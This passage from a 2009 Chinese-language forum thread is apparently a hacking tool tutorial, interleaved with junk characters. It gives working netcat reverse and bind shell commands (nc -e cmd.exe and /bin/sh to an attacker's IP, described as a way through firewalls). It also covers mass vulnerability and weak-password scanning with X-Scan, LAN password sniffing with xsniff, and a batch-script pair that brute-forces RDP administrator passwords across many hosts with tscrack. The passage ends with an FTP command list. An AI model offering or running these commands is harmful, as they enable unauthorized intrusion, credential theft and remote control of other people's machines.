    $ Y9 q# K; a6 E-v 详细输出,用-vv将更详细( I3 l, d6 P1 i# [  U
    -w数字 timeout延时间隔/ W, [8 a# |# `+ q
    -z 将输入,输出关掉(用于扫锚时)* t. R$ O! I1 J( Q# {! w9 L
    基本用法:
    % a& K* g$ P" F2 f) ync -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口+ C) m( F& y6 m2 i5 p, {1 X
    nc -l -p 80 开启本机的TCP 80端口并监听
    ) ^  u- s0 [# n3 Inc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
    ! S# ^; ^/ e$ D, Wnc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
    . y  E7 ^, B* i2 n& Ync -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
    2 A: F. I& k9 e) b* R- ^! P高级用法:7 ?( E  X. f9 V( s( d7 A
    nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止- t) E) X2 j2 \. B
    nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
    & }. H; _% {0 Znc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
    2 a4 w( n% Q2 ~% K& |type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用: a' C. @" H; R- j+ F& E9 o% A
    本机上用:nc -l -p 本机端口9 Q1 h3 V7 u; t7 I' O& e2 ?
    在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K. a1 X3 s2 ]/ D* d8 T
    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙- A# r- V5 V! [) q& q3 y1 d- D
    本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
    3 c- Q& R! t3 L3 [在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机( M4 O2 `% k; Y5 D
    备 注:
    # z" S0 t8 Y% J# t5 o( g| 管道命令9 e* I/ v; p  @3 B4 k3 R6 _
    < 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令  `- T! E% K9 e' j
    @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中1 D1 a$ c2 i/ {& [7 q' S% c$ Y
    >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。: L# l7 f+ O: Z
    如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。% R5 F" z8 D/ G' w! o
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    8
     楼主| 发表于 2009-5-4 09:37:30 | 只看该作者
    八:
    0 P& `+ i0 u) p( I% m( Q2、扫锚工具:xscan.exe2 T% j+ u' g" k  @4 Y% C3 k
    基本格式
    6 X; X- ?. `/ t1 Z. Z5 B) x* @2 Wxscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息) w5 Z9 B, M8 y9 h
    xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
    3 e* Z7 g  a) S( ?% B2 k检测项目
    . a. A! u% v6 A/ k+ ~4 P-active 检测主机是否存活
    2 X( h  H$ i  O3 P; L# \-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)( `6 E, P2 B0 N2 g* D( [
    -port 检测常用服务的端口状态
    5 t' C( H+ |* Z0 ^-ftp 检测FTP弱口令. O* d" m" k7 L  z0 E0 {6 P
    -pub 检测FTP服务匿名用户写权限
    4 `- s) F9 m/ z" _7 K-pop3 检测POP3-Server弱口令
    % j5 x/ u4 B% A0 W- E: |! v-smtp 检测SMTP-Server漏洞
    9 ^' ], B/ a. J  V( r7 a-sql 检测SQL-Server弱口令
      v: v5 _0 X0 B( s3 v5 e-smb 检测NT-Server弱口令3 o$ E- J5 x: s6 l$ n* N4 o
    -iis 检测IIS编码/解码漏洞
    + S6 B& X" ]8 L8 b! `2 x) @- m-cgi 检测CGI漏洞+ X+ e" n, T7 W0 w# s
    -nasl 加载Nessus攻击脚本2 h9 |+ X9 X) G
    -all 检测以上所有项目# J3 G) c- `2 m- k* l% u7 l. P3 }1 S
    其它选项# U% C3 H; c8 c  x% m  ~
    -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取& L3 |) k7 i, [( O1 F% P
    -l 显示所有网络适配器# f) g# i$ w) U: x4 n
    -v 显示详细扫描进度
    / u# b( f. H9 Q-p 跳过没有响应的主机
      z3 @" C6 B: `2 P$ [-o 跳过没有检测到开放端口的主机5 ^# F+ h8 Q; `6 I+ b3 \% L7 O( B
      -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
    9 u* f, M; w% {-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
    - a5 w# f3 W  Y1 F" h用法示例/ N% \9 e* X! k2 ?) N' N7 Y1 ~
    xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
    - H* m; {2 [. |+ F3 Hxscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
    + V2 m7 l# G* O& _  M( Y8 Zxscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
    7 p3 f! W6 a6 U3 G% M0 q
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    9
     楼主| 发表于 2009-5-4 09:38:18 | 只看该作者
    九:( m0 o! D2 g/ q2 b8 N" y
    3、命令行方式嗅探器: xsniff.exe
    / W4 l$ X2 L* u# D可捕获局域网内FTP/SMTP/POP3/HTTP协议密码3 L/ ]6 c# a  A- I8 G
    参数说明# b* s" G8 D0 K: y! f
    -tcp 输出TCP数据报
    ' `. @2 m: a$ r) i  I& O1 ~+ f-udp 输出UDP数据报
    ! o$ V- T. ~8 f5 ?0 X-icmp 输出ICMP数据报
      V2 d0 w: z" g& N( f, k-pass 过滤密码信息
    ; ?! t8 _3 W9 E0 j( u-hide 后台运行1 Q$ G# R& X& @5 r' C, X5 C; c
    -host 解析主机名
    : {3 ?7 G6 F' Z, O9 b& x-addr IP地址 过滤IP地址% r7 {' G* O, `, O5 f( S
    -port 端口 过滤端口; ~. u' z1 d' a( ?+ z
    -log 文件名 将输出保存到文件( Q3 I6 f: D  S5 c0 X( d9 |  T# C
    -asc 以ASCII形式输出
    $ s# G" t0 `7 m% X2 p) {( H-hex 以16进制形式输出. Y" v6 h, }$ u; n: _1 ?5 T9 E
    用法示例
    : C* e, i, W* z. @8 m. Kxsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
    , y; B) {& h( n9 _) \7 Pxsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
    6 t& J9 ^1 ~* z% B5 A4、终端服务密码破解: tscrack.exe2 j0 W  [: U  ~2 C7 }
    参数说明
      ]! _, C, }/ a! |, p6 ~* o5 e* e$ D-h 显示使用帮助
      A6 h2 B& r  J- ^! i-v 显示版本信息( T: i- G8 c" N; ^, \) S
    -s 在屏幕上打出解密能力& U; u8 l  z6 K& k( X
    -b 密码错误时发出的声音
    - m  E) F* |' J; K. ]& `& ~6 a-t 同是发出多个连接(多线程)
    9 S, W" V$ }7 c* _/ Z% R& ?5 b-N Prevent System Log entries on targeted server
    . S( N* Y! K' G: C-U 卸载移除tscrack组件
    + W! E: W1 T$ L  `' t-f 使用-f后面的密码4 }/ w* y2 ?9 r0 u2 b0 p6 d, e; W
    -F 间隔时间(频率)
    + P9 g2 W" J& M7 c; g$ @# O-l 使用-l后面的用户名
    6 y( J4 Q/ ~9 x. Y5 Z-w 使用-w后面的密码字典9 \7 ^$ Z0 m6 {0 t
    -p 使用-p后面的密码
    ' y* b! s% ^; a: T9 o8 ^-D 登录主页面
    0 d" d) i7 F3 h6 ~- Y$ P6 u1 Z用法示例+ P& x. g* v* a
    tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的admi
    1 K# i% ^; v& v# H) i; Mnistrator的登陆密码! ^' J' }2 @5 S, q2 k' r: ]/ Z( C
    tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户
    , u! n+ Q- q/ I* w2 Q9 ^; P  t; S@if not exist ipcscan.txt goto noscan7 W1 h7 j- }  ?4 v/ Y
    @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
    - L2 R. V0 n5 e) J& `& b4 D' Wnscan4 R5 g# ?% `1 O% P9 V$ C
    @echo 3389.txt no find or scan faild
    # z# D& x2 l; g3 g8 q# K(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
    - E; F1 I- ^* J- v6 U, ?3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat2 e0 ?4 k5 ?, ^( u! w
    @if not exist tscrack.exe goto noscan
    3 u$ v' c4 j2 A7 V@tscrack %1 -l administrator -w pass.dic >>rouji.txt: S3 G, _; d2 C
    :noscan8 ]: ^* J+ P' ^% {
    @echo tscrack.exe no find or scan faild8 e7 y* k% h; v( d
    (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)
    # w9 M/ J; u/ f; ?# X4 p' jhack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。% a/ a1 p9 M) `+ w; A
    5、其它:6 n: N3 c, E6 c) U, k0 ]& N+ ^' }
    Shutdown.exe( a$ \5 Q$ |: R% B: O
    Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。), B: i' L4 Q& r- d  h# C
    fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
    3 k% A5 Z, K/ @2 o) bfpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息' ^' S" u- b/ x' s! n  g; w
    Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
      T4 M: H3 }3 hOpenTelnet.exe (远程开启telnet工具)" x+ R: O) W0 i0 g  m
    opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。* J0 m* b& c8 H, f8 Q6 V  e
    NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。6 s/ \3 V9 |: ]6 S! b9 q+ ^
    ResumeTelnet.exe (OpenTelnet附带的另一个工具). Q2 ], r0 Z7 n
    resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。: {( l2 S, Q7 m4 U* o
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    10
     楼主| 发表于 2009-5-4 09:38:47 | 只看该作者
    十:
    ( @/ o+ x4 X% p% \* O( H6、FTP命令详解:- \' F1 ?" ~1 p0 L
    FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。
    1 V7 }: e: R' k5 H. B2 Z; Q- V: HFTP的命令行格式为:
    ( ~- C* ?' l; ]; H0 P, l9 Oftp -v -d -i -n -g [主机名] ,其中9 e  r4 k  w+ q4 y$ r2 q  Y* ]; x
    -v 显示远程服务器的所有响应信息8 U. @0 S, `6 A+ Z3 A( K
    -n 限制ftp的自动登录,即不使用;.n etrc文件;
    - m/ I3 q7 c! z  g7 H( I8 |" z& x-d 使用调试方式;
      m  r; X' W" G7 K$ J-g 取消全局文件名。
    2 k" Q3 j- p/ O2 bFTP使用的内部命令如下(中括号表示可选项):
    6 g& a, S# c3 I8 O2 U6 a1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip
    : u" ~  b! _$ p2 ]' i2.$ macro-ame[args]: 执行宏定义macro-name。
    * Z# U! O  Y0 k  A/ @3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。
    . ~- m, n1 S- f1 \/ f+ t, X9 B4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。- O* g9 R0 n) m, f3 I$ X/ \
    5.ascii:使用ascii类型传输方式。
    % [( o% B; l7 J6.bell:每个命令执行完毕后计算机响铃一次。8 C4 j* A  p; [! I3 @7 _' N7 i
    7.bin:使用二进制文件传输方式。
    ' x# K2 C) W5 h* s9 k8.bye:退出ftp会话过程。
    ' n5 o) h2 ?( D9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。. [4 x4 Y) ~, Y
    10.cd remote-dir:进入远程主机目录。" D0 Y0 k/ d# f/ a) z% M
    11.cdup:进入远程主机目录的父目录。
    * `/ @# W5 k7 P; m" d12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。
    1 Z( x0 b  f) ]" o" Q; [. n' ?13.close:中断与远程服务器的ftp会话(与open对应)。1 o( l& L* K* K* O3 y# z. g9 l+ Q: k
    14.cr:使用asscii方式传输文件时,将回车换行转换为回行。' T$ v1 _5 X4 ]# u' r+ `0 z+ I
    15.delete remote-file:删除远程主机文件。9 Y6 T4 L" A' Y; D- [
    16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。# o7 _7 i4 t5 t% t4 a. K! ~
    17.dir[remote-dir][local-file]:显示远程主机目
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表